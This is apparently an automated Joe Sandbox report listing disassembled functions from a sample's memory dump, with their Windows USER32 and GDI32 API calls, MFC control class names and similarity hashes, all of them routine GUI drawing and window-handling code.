Function 00BF7756 Relevance: 22.7, APIs: 15, Instructions: 232timeCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BF778C
InflateRect.USER32(?,00000000,00000000), ref: 00BF77BB
SetRectEmpty.USER32(?), ref: 00BF7859
SetRectEmpty.USER32(?), ref: 00BF7862
GetSystemMetrics.USER32(00000002), ref: 00BF7883
KillTimer.USER32(?,00000002), ref: 00BF791D
EqualRect.USER32(?,?), ref: 00BF793F
EqualRect.USER32(?,?), ref: 00BF7950
EqualRect.USER32(?,?), ref: 00BF79A1
InvalidateRect.USER32(?,?,00000001), ref: 00BF79BA
InvalidateRect.USER32(?,?,00000001), ref: 00BF79C2
EqualRect.USER32(?,?), ref: 00BF79D6
InvalidateRect.USER32(?,?,00000001), ref: 00BF79E9
InvalidateRect.USER32(?,?,00000001), ref: 00BF79F1
UpdateWindow.USER32(?), ref: 00BF7A04

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
String ID:
API String ID: 2140115980-0
Opcode ID: e9dee39ec4c799c89d0914d4ac312f25a676bc30ba9f54562b86d8a4187fe9da
Instruction ID: e91f1d98d8bf7d02c77815bbe308d5b4f30fe3dd094c8c80c8121e5f470eac68
Opcode Fuzzy Hash: e9dee39ec4c799c89d0914d4ac312f25a676bc30ba9f54562b86d8a4187fe9da
Instruction Fuzzy Hash: A991297194021AEFCF10DFA4C984AEE7BB9FF08300F1445B9ED05AB215DBB1A945CBA1

Function 00C00406 Relevance: 22.7, APIs: 15, Instructions: 199windowCOMMON

Download Yara Rule

APIs

GetDlgCtrlID.USER32(?), ref: 00C00470
GetDlgItem.USER32(?,?), ref: 00C004FA
ShowWindow.USER32(00000000,00000000), ref: 00C00505
GetMenu.USER32(?), ref: 00C00517
InvalidateRect.USER32(?,00000000,00000001), ref: 00C00532

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

GetDlgItem.USER32(?,0000E900), ref: 00C0056F
SetWindowLongA.USER32(00000000,000000F4,0000EA21), ref: 00C0058C
GetDlgItem.USER32(0000EA21,0000EA21), ref: 00C005A5
GetDlgItem.USER32(0000E900,0000E900), ref: 00C005BB
SetWindowLongA.USER32(00000000,000000F4,0000EA21), ref: 00C005CD
SetWindowLongA.USER32(?,000000F4,0000E900), ref: 00C005D9
InvalidateRect.USER32(00000001,00000000,00000001), ref: 00C005EC
SetMenu.USER32(00000000,00000000), ref: 00C00603
GetDlgItem.USER32(?,00000000), ref: 00C0064A
ShowWindow.USER32(?,00000005), ref: 00C00658

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ItemWindow$Long$InvalidateMenuRectShow$CtrlException@8H_prolog3Throw
String ID:
API String ID: 3935238147-0
Opcode ID: 614e8a08587c2270603e5e59501fa3103dfe33bd4d0c527a1adc5b9435aac056
Instruction ID: f95935bb4984454fc94d6762c99a19927f181ede3a4402fea30e7b9148ae18ee
Opcode Fuzzy Hash: 614e8a08587c2270603e5e59501fa3103dfe33bd4d0c527a1adc5b9435aac056
Instruction Fuzzy Hash: F2817530600604EFCB219F64C888BA9BBF5FF45701F258969F96ADB2A1D731EA40CF51

Function 00C2CCF3 Relevance: 22.7, APIs: 15, Instructions: 161windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2CCFA
GetIconInfo.USER32(?,?), ref: 00C2CDAB
GetObjectA.GDI32(?,00000018,?), ref: 00C2CDBA
CreateCompatibleDC.GDI32(00000000), ref: 00C2CDE6
CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 00C2CE00
SelectObject.GDI32(?,00000000), ref: 00C2CE11
FillRect.USER32(?,?), ref: 00C2CE3E
DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 00C2CE5C
SelectObject.GDI32(?,00000000), ref: 00C2CE6A
DeleteObject.GDI32(?), ref: 00C2CE73
DeleteObject.GDI32(?), ref: 00C2CE8B
DeleteObject.GDI32(?), ref: 00C2CE94
DestroyIcon.USER32(?,00000070,00C2DCE0,?,00000000,00000000,00000000,00000000,00000000), ref: 00C2CEE6
DestroyIcon.USER32(?), ref: 00C2CEF0
DestroyIcon.USER32(?), ref: 00C2CEFA

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Icon$DeleteDestroy$Select$CompatibleCopyCreateDrawFillH_prolog3_ImageInfoRect
String ID:
API String ID: 2061919445-0
Opcode ID: 6b8c6f088136d90d14834d1c1c57f263cadb0f28006c3dd9b93b57f778678318
Instruction ID: 78e69b36ed62dc57341f7f4678efbcbf68163a30d48a71c3c831be74a6699ef5
Opcode Fuzzy Hash: 6b8c6f088136d90d14834d1c1c57f263cadb0f28006c3dd9b93b57f778678318
Instruction Fuzzy Hash: 5A610674900618EFCB21DFA4ECC4ADEBFB5FF48700F20452AE526A6660D7316A55DF60

Function 00C4A66C Relevance: 21.3, APIs: 14, Instructions: 264windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C4A6A5
GetSystemMetrics.USER32(00000015), ref: 00C4A7A6
GetSystemMetrics.USER32(00000015), ref: 00C4A7B5
InflateRect.USER32(?,00000000,00000001), ref: 00C4A7F5
InvalidateRect.USER32(?,?,00000001), ref: 00C4A804
InflateRect.USER32(?,00000000,00000000), ref: 00C4A828
InvalidateRect.USER32(?,?,00000001), ref: 00C4A837
UpdateWindow.USER32(?), ref: 00C4A840
GetCapture.USER32 ref: 00C4A85D
GetCursorPos.USER32(?), ref: 00C4A895
GetSystemMetrics.USER32(00000044), ref: 00C4A8B5
GetCapture.USER32 ref: 00C4A8BE
GetParent.USER32(?), ref: 00C4A8F5
SendMessageA.USER32(?,?,?,00000000), ref: 00C4A91B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$MetricsSystem$CaptureInflateInvalidate$ClientCursorMessageParentScreenSendUpdateWindow
String ID:
API String ID: 2772127108-0
Opcode ID: de308fec000d449763f763de087d586a30280b5fafe88a0f54719a103d2202ce
Instruction ID: 6def30d5cef14538ec6112b0eef6bac991911e3a7a4d1153ae648ffed85d41aa
Opcode Fuzzy Hash: de308fec000d449763f763de087d586a30280b5fafe88a0f54719a103d2202ce
Instruction Fuzzy Hash: ADA11971A006099FCF14DFA8C888AED7BF5FF48300F1545B9E919EB265DB30AA41CB61

Function 00BFB543 Relevance: 21.2, APIs: 14, Instructions: 206timewindowCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001), ref: 00BFB554
KillTimer.USER32(?,00000002), ref: 00BFB55B
IsWindow.USER32(?), ref: 00BFB5AB
PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00BFB5C8
GetCursorPos.USER32(?), ref: 00BFB605
ScreenToClient.USER32(?,?), ref: 00BFB612
KillTimer.USER32(?,00000001), ref: 00BFB627
PtInRect.USER32(?,?,?), ref: 00BFB656
KillTimer.USER32(?,00000002), ref: 00BFB6CB
GetParent.USER32(?), ref: 00BFB6E0
PtInRect.USER32(?,?,?), ref: 00BFB70B
KillTimer.USER32(?,00000014), ref: 00BFB759
GetClientRect.USER32(?,?), ref: 00BFB772
PtInRect.USER32(?,?,?), ref: 00BFB782

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: KillTimer$Rect$Client$CursorMessageParentPostScreenWindow
String ID:
API String ID: 2803392424-0
Opcode ID: 3a4cef1967c4c93bdabbb0ba6cc69c085a1b3df1e224434ca1560133152dc911
Instruction ID: 23074e311e15fbf58053269435d83011ad9f2a977a713c2027894e6818a3756d
Opcode Fuzzy Hash: 3a4cef1967c4c93bdabbb0ba6cc69c085a1b3df1e224434ca1560133152dc911
Instruction Fuzzy Hash: 22714A716006089FCB21AFA4CCC4F7EBBF6EF84310F1445AAE64697261DB31AD45DB51

Function 00C50E39 Relevance: 21.2, APIs: 14, Instructions: 197windowCOMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,?,00000000,00000105,?,?,00000000), ref: 00C50E76
PtInRect.USER32(?,?,?), ref: 00C50E83
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C50EA6
GetParent.USER32(?), ref: 00C50EC2
SendMessageA.USER32(?,?,?,00000000), ref: 00C50EEC
SendMessageA.USER32(?,?,?,00D03054), ref: 00C50F32
ReleaseCapture.USER32 ref: 00C50F42
ReleaseCapture.USER32 ref: 00C50FE5
ReleaseCapture.USER32 ref: 00C51033
IsRectEmpty.USER32(?), ref: 00C51091
InvalidateRect.USER32(?,?,00000000,?,?,00000000), ref: 00C510A9
IsRectEmpty.USER32(?), ref: 00C510AF
InvalidateRect.USER32(?,?,00000000,?,?,00000000), ref: 00C510C1
UpdateWindow.USER32(?), ref: 00C510C6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CaptureMessageReleaseSend$EmptyInvalidateWindow$ParentRedrawUpdate
String ID:
API String ID: 1443145988-0
Opcode ID: 589c05ba2359c523205e88af3020cfe2bae6653230a238d0fc24d52923557051
Instruction ID: 5adde5aa200eb1ab601a9ad68329bf8c298beac8a5734c463913ccbb3e995e90
Opcode Fuzzy Hash: 589c05ba2359c523205e88af3020cfe2bae6653230a238d0fc24d52923557051
Instruction Fuzzy Hash: CF817E756007459FCB309F65C888BEEBBF5BF48301F14492DE9AAD62A0DB30A984DF15

Function 00BE98F9 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE9900

Part of subcall function 00C2C994: __EH_prolog3.LIBCMT ref: 00C2C99B

Strings

MFCVSListBox, xrefs: 00BE9B36
MFCColorButton, xrefs: 00BE9955
MFCEditBrowse, xrefs: 00BE998C
MFCButton, xrefs: 00BE991B
MFCMenuButton, xrefs: 00BE9A68
MFCFontComboBox, xrefs: 00BE99C3
MFCPropertyGrid, xrefs: 00BE9A9F
MFCMaskedEdit, xrefs: 00BE9A31
MFCLink, xrefs: 00BE99FA
MFCShellTree, xrefs: 00BE9B06
MFCShellList, xrefs: 00BE9AD6

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3
String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
API String ID: 431132790-2110171958
Opcode ID: 0cdb81255077ebfff78023742f430ca1bd69ab388fd108fc049f9faa2ea310b0
Instruction ID: d09f5d025826813c55f096608a1bac383d05315ba527fe085d61588625b11552
Opcode Fuzzy Hash: 0cdb81255077ebfff78023742f430ca1bd69ab388fd108fc049f9faa2ea310b0
Instruction Fuzzy Hash: DF510620A082C5D6DF59FBB6E8526BCB6D89F10B00F1440EEF40A96383EBB45B48D657

Function 00C309E3 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C309ED
GetObjectA.GDI32(00000000,00000018,?), ref: 00C30A1F
GetObjectA.GDI32(?,00000054,?), ref: 00C30A57
CreateCompatibleDC.GDI32(00000000), ref: 00C30AED
SelectObject.GDI32(?,?), ref: 00C30B0C
GetPixel.GDI32(?,?,00000000), ref: 00C30B99
GetPixel.GDI32(?,?,00000000), ref: 00C30BAB
SetPixel.GDI32(?,?,00000000,00000000), ref: 00C30BBA
SetPixel.GDI32(?,?,00000000,?), ref: 00C30BCC
SelectObject.GDI32(?,?), ref: 00C30C03

Strings

, xrefs: 00C30A5D
, xrefs: 00C30A35

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
String ID: $
API String ID: 1266819874-227171996
Opcode ID: 9541902036f5d0c39df655b19cbe218eac3db306f0bbe8bda91a11abab43ef4b
Instruction ID: ae0cb3bb49fbb3b71aa54f21dd811bc96b42605baef8f097177bfb9b9c228e36
Opcode Fuzzy Hash: 9541902036f5d0c39df655b19cbe218eac3db306f0bbe8bda91a11abab43ef4b
Instruction Fuzzy Hash: 8771E472D10219DFDF20DFA9CC94AADBBB5FF14314F2041A9D519AB252D731AA81DF40

Function 00BF85C7 Relevance: 19.8, APIs: 13, Instructions: 269windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,0000000F,0000000F), ref: 00BF8606
DispatchMessageA.USER32(?), ref: 00BF8618
PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00BF8628
GetCapture.USER32 ref: 00BF862E
SetCapture.USER32(?), ref: 00BF863B
GetWindowRect.USER32(?,?), ref: 00BF865F
GetCapture.USER32 ref: 00BF86BE
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00BF86D9
DispatchMessageA.USER32(?), ref: 00BF86FD
GetScrollPos.USER32(?,00000002), ref: 00BF8814
RedrawWindow.USER32(?,00000000,00000000,00000581), ref: 00BF882E

Part of subcall function 00BE2566: ShowWindow.USER32(00000000,?,?,00BDA1D1,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 00BE2577

ReleaseCapture.USER32 ref: 00BF88BA
IsWindow.USER32(?), ref: 00BF88C3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$CaptureWindow$Dispatch$PeekRectRedrawReleaseScrollShow
String ID:
API String ID: 1149966214-0
Opcode ID: 9f3f0c0b3a824accdb41c1e577943f15bd14013cda53974e5351618d6d529d79
Instruction ID: 32b3af8440f514c017fd0c8efa44f346a0f2845559029710dd7722ab0d664f8d
Opcode Fuzzy Hash: 9f3f0c0b3a824accdb41c1e577943f15bd14013cda53974e5351618d6d529d79
Instruction Fuzzy Hash: 57A14A71A00649DFDB20EFA4C988ABEB7F9FF48340F6444AEE24697250CF30AC458B50

Function 00BFCB00 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 397keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 00BFCB5E
GetAsyncKeyState.USER32(00000011), ref: 00BFCBBD
IsRectEmpty.USER32(?), ref: 00BFCC84
IsRectEmpty.USER32(?), ref: 00BFCD2B
SendMessageA.USER32(?,00000100,00000024,00000000), ref: 00BFCE62
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00BFCF2F
GetClientRect.USER32(?,?), ref: 00BFCF97
InvalidateRect.USER32(?,?,00000001), ref: 00BFCFD0
InvalidateRect.USER32(?,?,00000001), ref: 00BFCFDB
UpdateWindow.USER32(?), ref: 00BFCFE0

Strings

!, xrefs: 00BFCDB3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInvalidateMessageSendState$AsyncClientUpdateWindow
String ID: !
API String ID: 348497913-2657877971
Opcode ID: 0891b94fb5f9747e04aae8937acab02a28bbe56a047e30127a53c2ec9d363648
Instruction ID: 354257377ea9420aa5e5d98366b8fc9ca59c128b015fc430cffb10b7942e8378
Opcode Fuzzy Hash: 0891b94fb5f9747e04aae8937acab02a28bbe56a047e30127a53c2ec9d363648
Instruction Fuzzy Hash: 0EE13E31A0021D9BDB20DF64DAC4BBDBBF5EF48710F1941B9E909AB255D730AC89DB90

Function 00C5FB2C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C5FB33
GetObjectA.GDI32(00000018,00000018,00CF5D10), ref: 00C5FB4F
_memmove.LIBCMT ref: 00C5FBAD

Strings

, xrefs: 00C5FB99

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: H_prolog3Object_memmove
String ID:
API String ID: 107514201-3916222277
Opcode ID: 74bc5dd6f7d1404b0090129666f51bffcfee83e1dd97ebe735041daa72177926
Instruction ID: d6d62c8722918b4ffceb8cb025c571bbfaac8ee00b56286124692131bd2516a5
Opcode Fuzzy Hash: 74bc5dd6f7d1404b0090129666f51bffcfee83e1dd97ebe735041daa72177926
Instruction Fuzzy Hash: 3C411A75D00119EFCF29DFA4CC919AEBBB5EF44311F10403AE922A72A1DB316E4ADB54

Function 00C339CC Relevance: 18.3, APIs: 12, Instructions: 318windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 00C339ED
IsRectEmpty.USER32(?), ref: 00C33A19
IntersectRect.USER32(?,?,?), ref: 00C33A98
IntersectRect.USER32(?,?,?), ref: 00C33B34
IsRectEmpty.USER32(?), ref: 00C33B72
IsRectEmpty.USER32(?), ref: 00C33B80
SelectObject.GDI32(?), ref: 00C33B96
IsRectEmpty.USER32(?), ref: 00C33BAF
IsRectEmpty.USER32(?), ref: 00C33BC7
StretchBlt.GDI32(00000000,?,?,?,?,?,?,?,?,00CC0020), ref: 00C33C6C
SelectObject.GDI32(?), ref: 00C33C7D
SetRectEmpty.USER32(?), ref: 00C33CF8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$IntersectObjectSelect$Stretch
String ID:
API String ID: 401711590-0
Opcode ID: c89c9dab693490235c5de1c0cdb0587865fadfdacb494a182ecfdd41521191c1
Instruction ID: d874a683e9240a20b2829cb52a8e1bdc97eadd85688d9fffc57475c843fedc2f
Opcode Fuzzy Hash: c89c9dab693490235c5de1c0cdb0587865fadfdacb494a182ecfdd41521191c1
Instruction Fuzzy Hash: CAC1E372A1024AAFCF05CFA8C984AEEBBB5FF48314F155219F815EB214D730EA45DB60

Function 00BFB22B Relevance: 18.3, APIs: 12, Instructions: 257timewindowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00BFB246
GetCursorPos.USER32(?), ref: 00BFB265
ScreenToClient.USER32(?,?), ref: 00BFB272
GetParent.USER32(?), ref: 00BFB315
SetTimer.USER32(?,00000002,FFFFFFFE,00000000), ref: 00BFB36E
InvalidateRect.USER32(?,000000AB,00000001), ref: 00BFB37D
UpdateWindow.USER32(?), ref: 00BFB386
KillTimer.USER32(00000002,00000002,00000000), ref: 00BFB393
KillTimer.USER32(?,00000002), ref: 00BFB449
GetParent.USER32(?), ref: 00BFB464
GetParent.USER32(?), ref: 00BFB4BA
SendMessageA.USER32(?,0000011F,00000000,?), ref: 00BFB536

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ParentTimer$KillWindow$ClientCursorInvalidateMessageRectScreenSendUpdate
String ID:
API String ID: 2010726786-0
Opcode ID: e28455f64ad93d394063d29e4e9e315721247598a33a44994dde8098c8b7d85d
Instruction ID: a629f2245ccb1b5e426642524857be619d0e6a70ed7163beaa0f13c3dbe18bf4
Opcode Fuzzy Hash: e28455f64ad93d394063d29e4e9e315721247598a33a44994dde8098c8b7d85d
Instruction Fuzzy Hash: BB917C316007099FDB289FA4C898F7E7BE5FF44310F1444A9EA5A9B2A1DB30ED48DB11

Function 00C32D75 Relevance: 18.2, APIs: 12, Instructions: 226windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C32D7C
TransparentBlt.MSIMG32(00000000,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,000000FF,00000048,00C3399A,00000000,?,?), ref: 00C32DD4
CreateCompatibleDC.GDI32(?), ref: 00C32E19
CreateCompatibleDC.GDI32(?), ref: 00C32E36
CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 00C32E54
StretchBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00C32EB8
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00CC0020), ref: 00C32EE6
CreateBitmap.GDI32(00000000,00000000,00000001,00000001,00000000), ref: 00C32EF3
BitBlt.GDI32(00C123B7,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CC0020), ref: 00C32F2C
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00C123B7,00000000,00000000,008800C6), ref: 00C32F5A
BitBlt.GDI32(?,?,00000000,00000000,00000000,00C123B7,00000000,00000000,008800C6), ref: 00C32F87
BitBlt.GDI32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00EE0086), ref: 00C32FA2

Part of subcall function 00BD82A0: DeleteDC.GDI32(00000000), ref: 00BD82B2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
